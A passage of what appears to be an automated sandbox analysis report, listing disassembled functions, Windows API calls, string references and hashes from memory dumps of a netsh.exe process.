                • Part of subcall function 01567920: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(000000B6,00000000,-00000001,0156471D,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567981
                • Part of subcall function 01567920: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,-00000001,0156471D,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 01567998
                • Part of subcall function 01567920: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679A8
                • Part of subcall function 01567920: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679B4
                • Part of subcall function 01567920: PrintError.NETSH(00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679BC
                • Part of subcall function 01567920: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679C5
                • Part of subcall function 01567920: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01567E48,?,01567F23,?,0156471D,000000B6,?), ref: 015679CC
                • Part of subcall function 01569CA9: __iob_func.MSVCRT ref: 01569CAE
              • fflush.MSVCRT ref: 01568026
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01568030
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01568037
              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 01568045
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$Free$AllocByteCharConsoleErrorFileMultiOutputWideWrite$CloseFormatHandleLastLoadLocalMessagePrintString__iob_funcfflush
              • String ID:
              • API String ID: 2883199061-0
              • Opcode ID: 999d4f41326284768efb5dc5347f0b962840dc179be05410e53a906d245059db
              • Instruction ID: 6b03313ce688af397fc6dd2bf70da863f8fea8f37bcc1f3af5cf249dcf5929dd
              • Opcode Fuzzy Hash: 999d4f41326284768efb5dc5347f0b962840dc179be05410e53a906d245059db
              • Instruction Fuzzy Hash: 01119AB2510209BFEB219FA5EC4EE9F7BACFB44275B110425BA099B240DA719D049BB0
              Function 015694A3 Relevance: 10.6, APIs: 7, Instructions: 105sleepCOMMON
              Download Yara Rule
              APIs
              • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,01569D60,0000000C), ref: 015694E0
              • _amsg_exit.MSVCRT ref: 015694F5
              • _initterm.MSVCRT ref: 01569549
              • __IsNonwritableInCurrentImage.LIBCMT ref: 01569575
              • exit.MSVCRT ref: 015695BC
              • _XcptFilter.MSVCRT ref: 015695CE
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
              • String ID:
              • API String ID: 796493780-0
              • Opcode ID: 19eebf60461f576fc333860d6b40ec0277d9d9551d88347bbb6283b2fd4e008e
              • Instruction ID: 899225d4c01e5d78e0e4a3c786080844c1816d0dbf92014c35a09dede62a002c
              • Opcode Fuzzy Hash: 19eebf60461f576fc333860d6b40ec0277d9d9551d88347bbb6283b2fd4e008e
              • Instruction Fuzzy Hash: E0310171680312DFDB72AF28F486A2D37A8FB44778F11002DE5218F294DB358848EBD0
              Function 015630D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64memoryCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00004008), ref: 015630E5
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015630EC
              • ProcessCommand.NETSH(?,?,?,netsh), ref: 01563152
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,netsh), ref: 01563165
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156316C
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$AllocCommandFree
              • String ID: netsh
              • API String ID: 2704014861-4166728403
              • Opcode ID: a8a454b95723ac2fb3ec1e4411dabde64b2083837fbce3bc4ef2ba87ed27d1c8
              • Instruction ID: 95a478a73b4cf52dc0e238673d3452b5f2f60e51e1d48cb7e2343544e55a7bad
              • Opcode Fuzzy Hash: a8a454b95723ac2fb3ec1e4411dabde64b2083837fbce3bc4ef2ba87ed27d1c8
              • Instruction Fuzzy Hash: 47119372A10206EBD7219F69E809E5E7BBDBB84720F1A8019E91D9F344DB70E905C7E1
              Function 015644DB Relevance: 10.1, APIs: 8, Instructions: 100memoryCOMMON
              Download Yara Rule
              APIs
              • _wcsicmp.MSVCRT ref: 01564512
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000000,?,?,?,01564828), ref: 01564548
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01564828), ref: 0156454F
              • memcpy.MSVCRT ref: 0156456A
              • memcpy.MSVCRT ref: 0156457F
              • memcpy.MSVCRT ref: 015645A9
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,01564828), ref: 015645BD
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,01564828), ref: 015645C4
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$memcpy$Process$AllocFree_wcsicmp
              • String ID:
              • API String ID: 1032568189-0
              • Opcode ID: 07e89795480e4615d6d6480ebaf79ed301d2d349da490c329ba689c7c797b7a1
              • Instruction ID: 73c96ca5b6ea97f2b1414a9d730a4750e6b138e5366d74b0eb8565f363060db0
              • Opcode Fuzzy Hash: 07e89795480e4615d6d6480ebaf79ed301d2d349da490c329ba689c7c797b7a1
              • Instruction Fuzzy Hash: 5E31B172600A019FD7259F78DD8A92BBBFEFF90228705192DE257CBD90DA31F8108B50
              Function 00E26940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
              • Instruction ID: f646360eaba9e5a5eaff200f9fef54733caa4d5c7cf9252d3d02c8bd10cc6c4d
              • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
              • Instruction Fuzzy Hash: B3024670608351AFC704DF28D490A6FBBE5EFC8704F149A2DF989AB265DB31E904CB52
              Function 00D7F5B0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 382COMMON
              Download Yara Rule
              Strings
              • known by the service. It may be a more recent revision than the service is aware of., xrefs: 00D7F82C
              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00DC02E7
              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00DC02BD
              • RTL: Re-Waiting, xrefs: 00DC031E
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID:
              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting$known by the service. It may be a more recent revision than the service is aware of.
              • API String ID: 0-797994856
              • Opcode ID: 8be28ca327fab01d6411c35ac8e63b18ca7a99bdbbc9f9349cc10a6c32b29e30
              • Instruction ID: d9b173ab1b360790daeae07c7fc90a847c15c01ae01f84d08e8bbb5ee0f54d64
              • Opcode Fuzzy Hash: 8be28ca327fab01d6411c35ac8e63b18ca7a99bdbbc9f9349cc10a6c32b29e30
              • Instruction Fuzzy Hash: EAE19F70604742DFD725CF28C885B2ABBE0FB85314F284A2DF5A9872D1E774D945CB62
              Function 015632CF Relevance: 9.1, APIs: 6, Instructions: 61memoryCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,015632C6,?,?,?,00000000,?,?), ref: 015632EC
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,015632C6,?,?,?,00000000,?,?,?,01562F69,?,?), ref: 015632F3
              • memcpy.MSVCRT ref: 01563309
              • qsort.MSVCRT ref: 0156331A
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01563350
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563357
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$AllocFreememcpyqsort
              • String ID:
              • API String ID: 3964738767-0
              • Opcode ID: efbd717c15f7d66bbd1f3d19781c647ac67231c2ed11da79dbf32214a9d760d8
              • Instruction ID: ac103606638e21c032c5bcf901d39ec47ae2de9519ce4bbd92bf8c6379b39896
              • Opcode Fuzzy Hash: efbd717c15f7d66bbd1f3d19781c647ac67231c2ed11da79dbf32214a9d760d8
              • Instruction Fuzzy Hash: 0F11C432600605FFCB619BA4D889E6EBBBCFF84324F10441DF60A9B610CA30A904DB70
              Function 015633AA Relevance: 9.1, APIs: 6, Instructions: 59memoryCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000002,?,?,?,?,?,015633A3,?,?,?,?,?,0156348F), ref: 015633C7
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,015633A3,?,?,?,?,?,0156348F,?,00000002,00000002,?,015624DD), ref: 015633CE
              • memcpy.MSVCRT ref: 015633E4
              • qsort.MSVCRT ref: 015633F5
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01563425
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156342C
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$AllocFreememcpyqsort
              • String ID:
              • API String ID: 3964738767-0
              • Opcode ID: cf841ad7414711a41826891ad3588bc78f26395693246d51f9295f579f55a0e9
              • Instruction ID: ca62a635930c6d08d52ce5335ceba623455e6ed2e2e27a81d331309dd27eb08b
              • Opcode Fuzzy Hash: cf841ad7414711a41826891ad3588bc78f26395693246d51f9295f579f55a0e9
              • Instruction Fuzzy Hash: D811A372610601ABD7615BA9EC8DA5EBBBDFB84329F111419E24B9B900DA70E840CB60
              Function 01567B4B Relevance: 9.0, APIs: 6, Instructions: 48memoryCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000044,00000000,00000000,?,?,?,01567C75,-00000001,00000000,00000000,?,015679C1,00000000,00000000), ref: 01567B61
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01567C75,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D), ref: 01567B68
              • CreateWellKnownSid.API-MS-WIN-SECURITY-BASE-L1-1-0(0000001A,00000000,00000000,0156471D,?,01567C75,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48), ref: 01567B7C
              • CheckTokenMembership.API-MS-WIN-SECURITY-BASE-L1-1-0(00000000,00000000,000000B6,?,01567C75,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48,?,01567F23), ref: 01567B8C
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,01567C75,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48,?,01567F23), ref: 01567B9F
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01567C75,-00000001,00000000,00000000,?,015679C1,00000000,00000000,?,01567E48,?,01567F23,?,0156471D), ref: 01567BA6
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$AllocCheckCreateFreeKnownMembershipTokenWell
              • String ID:
              • API String ID: 2370236486-0
              • Opcode ID: f76ebcc7d375041c0460729199a315bdcb72a38fd413a83294ffffa87a556d9f
              • Instruction ID: 0bda843dd889ec9d6121fdfd5b66ba1c7f1f7a83f1f3d4f942af51e76d93db21
              • Opcode Fuzzy Hash: f76ebcc7d375041c0460729199a315bdcb72a38fd413a83294ffffa87a556d9f
              • Instruction Fuzzy Hash: E00162B2911115BBAB219FA6EC4DDEF7E7CEF86A68B010155BA14DB104E7308904E7B0
              Function 01567A20 Relevance: 9.0, APIs: 6, Instructions: 46memorywindowCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00008000), ref: 01567A3A
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01567A41
              • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,00000000,00004000), ref: 01567A59
              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000500,00000000,00000000,00000000,?,00000000,?), ref: 01567A74
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01567A7C
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01567A83
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$AllocFormatFreeLoadMessageString
              • String ID:
              • API String ID: 3754540327-0
              • Opcode ID: 00c0002602591c5abbf101d2839367a4bf7801dbb3fff6e50d1646a28390b463
              • Instruction ID: ed1a78f3b71add8646705b47f5d309f3e02abc7a181df8a45577cf9092d1c052
              • Opcode Fuzzy Hash: 00c0002602591c5abbf101d2839367a4bf7801dbb3fff6e50d1646a28390b463
              • Instruction Fuzzy Hash: 85018BB6910114BBDB218BA6EC0DEDF7EBCEB85725B010015BA19DA144D6709A04DBB0
              Function 01568230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationCOMMON
              Download Yara Rule
              APIs
              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000000), ref: 01568244
              • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 01568250
              • ResetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 0156825D
              • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(01568060,00000000), ref: 0156826A
              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 01568273
              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 0156827C
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: CloseConsoleHandle$CtrlCursorEventHandlerObjectPositionResetSingleWait
              • String ID:
              • API String ID: 2461670359-0
              • Opcode ID: d77d50131f437d1b85b7fd1e304526699190e130edfe67405c852cfe956869c5
              • Instruction ID: cea98ac27b5603fc8058b553246c03499a7a83216e73d9520b1d815f945063a8
              • Opcode Fuzzy Hash: d77d50131f437d1b85b7fd1e304526699190e130edfe67405c852cfe956869c5
              • Instruction Fuzzy Hash: D6F0F971510209FFCF526F61EC09E9E3B79FB48265F158524F926CE024DB718954EBA0
              Function 00D9B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: __aulldvrm
              • String ID: +$-$0$0
              • API String ID: 1302938615-699404926
              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
              • Instruction ID: 5e41580318014abc4bd1117c30c8cbd937b9eda234108fa770ea6ed13e98a1bf
              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
              • Instruction Fuzzy Hash: 8F81A370E052499EDF24CEA8EA917FEBBB5AF85330F1E425BD851AB291C7349840C771
              Function 00E020E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: %%%u$[$]:%u
              • API String ID: 48624451-2819853543
              • Opcode ID: 02bef10e69b1e300b5188e6ceb71481926fbf7ab91e8876932365f389b800387
              • Instruction ID: 06b2ed22e752b3dcabf21b55a0bdc0be7b99c65619ea38c790557797879e5044
              • Opcode Fuzzy Hash: 02bef10e69b1e300b5188e6ceb71481926fbf7ab91e8876932365f389b800387
              • Instruction Fuzzy Hash: 89216076A01119ABCB10DF79CC45AFEBBF8EF54744F04012AEA05E3241EB30DA458BB1
              Function 01563612 Relevance: 7.6, APIs: 6, Instructions: 89memoryCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01563695
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156369C
              • memcpy.MSVCRT ref: 015636B2
              • memcpy.MSVCRT ref: 015636D5
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 015636E7
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015636EE
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Processmemcpy$AllocFree
              • String ID:
              • API String ID: 1904491526-0
              • Opcode ID: 629dcf54d7bb96cdd3185aab6d494a87dc0991d1efa55c252c083999a071ee94
              • Instruction ID: 740b876f13632074f9e41c73c81efcafa5df133c87d40d22e59be16e1b350ee3
              • Opcode Fuzzy Hash: 629dcf54d7bb96cdd3185aab6d494a87dc0991d1efa55c252c083999a071ee94
              • Instruction Fuzzy Hash: 8221F8F1A00112AFDB50DF68FC4AA5DBBACFB44674B064065E819EF244D730EE04EBA0
              Function 01562249 Relevance: 7.6, APIs: 6, Instructions: 75memoryCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 015622CF
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015622D6
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 015622E1
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015622E8
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 015622F1
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015622F8
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$FreeProcess
              • String ID:
              • API String ID: 3859560861-0
              • Opcode ID: a0634e16c93fa095d5063b7a53e4e5efaf05681f1961983d7843ec8fab4bede3
              • Instruction ID: f68a93e6215ac0d263b465c88214cd36affb788d319363d16c2a0fbe1dea6ab6
              • Opcode Fuzzy Hash: a0634e16c93fa095d5063b7a53e4e5efaf05681f1961983d7843ec8fab4bede3
              • Instruction Fuzzy Hash: 80212E71710102EFDB115FA8D849B79B7B9FF89735F148454E6098F245D7309845CBA0
              Function 0156443D Relevance: 7.6, APIs: 6, Instructions: 65memoryCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000000,01563604), ref: 01564470
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,01563604), ref: 01564477
              • memcpy.MSVCRT ref: 0156448E
              • memcpy.MSVCRT ref: 015644B0
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,01563604), ref: 015644C0
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,01563604), ref: 015644C7
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Processmemcpy$AllocFree
              • String ID:
              • API String ID: 1904491526-0
              • Opcode ID: 67573d1544b8393692fdbc5e9c131c249c4cd694a69251b604f4b7a8c2f9e0ff
              • Instruction ID: 1abe232cdc0c969f1715b050b41854cdabd98f3534fbf6d1074dc56c4a6e9615
              • Opcode Fuzzy Hash: 67573d1544b8393692fdbc5e9c131c249c4cd694a69251b604f4b7a8c2f9e0ff
              • Instruction Fuzzy Hash: 30110432210602AFD3289B74DD9AA2BF7ADFB84221B45591DE257CF990DA70F4008B60
              Function 0156809E Relevance: 7.6, APIs: 5, Instructions: 52COMMON
              Download Yara Rule
              APIs
              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 015680BE
              • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 015680DA
              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 015680E5
              • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?), ref: 01568104
              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 0156810E
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmpDownload File
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Console$BufferFillInfoOutputScreen$AttributeCharacterCursorPosition
              • String ID:
              • API String ID: 2018928815-0
              • Opcode ID: 07ec5ba2ec3482d7423706e41bef60850a6dddebeaf31b0ae2ce449541593ad0
              • Instruction ID: 95cf83122665e6cbe951570f78b75da665283298a8468b344f7e26ed865b35bc
              • Opcode Fuzzy Hash: 07ec5ba2ec3482d7423706e41bef60850a6dddebeaf31b0ae2ce449541593ad0
              • Instruction Fuzzy Hash: A0110972910129AF8F12DFA5D949DFFBBBCFB49614B01001AF911F6100D7389909EB71
              Function 00D8BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
              Download Yara Rule
              Strings
              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00DC7B7F
              • RTL: Resource at %p, xrefs: 00DC7B8E
              • RTL: Re-Waiting, xrefs: 00DC7BAC
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmpDownload File
